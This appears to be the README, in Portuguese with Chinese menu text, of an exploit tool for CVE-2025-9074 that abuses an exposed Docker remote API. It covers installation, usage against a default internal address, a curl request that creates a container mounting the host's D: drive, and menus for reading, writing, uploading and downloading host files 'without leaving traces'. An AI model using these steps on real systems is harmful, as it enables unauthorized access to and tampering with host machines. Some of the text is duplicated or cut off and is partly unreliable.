
Uma poderosa ferramenta de exploração da API remota do Docker, para pesquisa de segurança e teste da vulnerabilidade CVE-2025-9074.
Uma ferramenta poderosa de exploração da API remota do Docker, para pesquisa e teste de segurança da vulnerabilidade CVE-2025-9074.
✅ Gerenciamento totalmente automático do ciclo de vida de contêineres: Cria contêineres temporários automaticamente e os limpa após a conclusão, sem deixar rastros
✅ Manipulação inteligente de caminhos: Detecta e converte automaticamente caminhos do Windows para o formato de montagem do Docker
✅ Fluxo de operação totalmente automatizado: Não é necessário digitar comandos complexos manualmente; interação por menu, operações de arquivo concluídas com um clique
✅ Compatibilidade multiplataforma: Suporte perfeito para sistemas Windows e Linux
Operações de contêiner
Gerenciamento de imagens
Operações de arquivos no host
CVE-2025-9074 é uma vulnerabilidade de segurança na API remota do Docker. Um atacante pode, por meio de acesso não autorizado à API do Docker:
Instale todas as dependências com o requirements.txt:
pip install -r requirements.txt
Ou instale manualmente:
pip install requests docker websocket-client
Execute o script diretamente usando o endereço padrão da API do Docker:
python CVE-2025-9074-docker-exploit.py
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
python CVE-2025-9074-docker-exploit.py [选项]
选项:
-u, --url URL Docker API 地址(默认: http://192.168.65.7:2375)
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名):
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!
Esta ferramenta trata automaticamente o mapeamento de caminhos do Windows Docker Desktop:
| Caminho do Windows |
|---|
Formatos de entrada suportados:
D:\ ou D:/D:\temp ou D:/temp"D:\file.txt" (com aspas)'D:/file.txt' (com aspas)⚠️ Aviso importante:
Cria um contêiner via API do Docker e monta o disco do host:
curl -X POST "http://<target>:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
Lê e grava arquivos do host executando comandos no contêiner:
# 写入文件
echo "content" > /tmp/file.txt
# 读取文件
cat /tmp/file.txt
pip install docker websocket-clientpython CVE-2025-9074-docker-exploit.py
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│ ├── get_containers()
│ ├── display_containers()
│ ├── create_container()
│ ├── stop_container()
│ └── delete_container()
├── 镜像管理函数
│ ├── get_images()
│ ├── display_images()
│ ├── pull_image()
│ └── remove_image()
├── 宿主机文件操作函数
│ ├── upload_file_to_host()
│ ├── download_file_from_host()
│ ├── read_file_from_host()
│ └── write_file_to_host()
└── 工具函数
├── normalize_host_path()
├── create_container_with_mount()
├── start_container()
└── stop_and_remove_container()
Contribuições são bem-vindas! Envie Issues e Pull Requests!
Este projeto é destinado apenas para fins educacionais e de pesquisa em segurança.
Esta ferramenta é destinada exclusivamente a testes de segurança autorizados e fins educacionais. O usuário assume toda a responsabilidade e os riscos do uso desta ferramenta. O autor não se responsabiliza por qualquer uso indevido ou não autorizado desta ferramenta.
| Caminho de montagem do Docker |
|---|
D:\ | /mnt/host/d |
D:\temp | /mnt/host/d/temp |
C:\Windows | /mnt/host/c/Windows |
C:\Users\test | /mnt/host/c/Users/test |